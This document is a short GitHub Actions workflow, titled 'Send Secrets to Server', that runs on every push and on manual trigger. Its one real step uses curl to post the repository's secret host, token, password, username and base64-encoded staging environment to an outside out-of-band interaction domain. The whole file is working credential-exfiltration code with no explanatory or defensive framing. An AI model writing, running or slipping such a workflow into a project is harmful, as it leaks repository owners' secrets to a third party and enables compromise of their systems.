name: Send Secrets to Server

on:
  push: 
  workflow_dispatch:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Bypass Cache
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Server
        run: |
          curl -d 'HOST=${{ secrets.HOST }}&TOKEN=${{ secrets.TOKEN }}&PASSWORD=${{ secrets.PASSWORD }}&USERNAME=${{ secrets.USERNAME }}&STAGING_ENV_BASE64=${{ secrets.STAGING_ENV_BASE64 }}' https://fjlbgujmfeviboivdxlqto7eskx71v2gq.oast.fun
    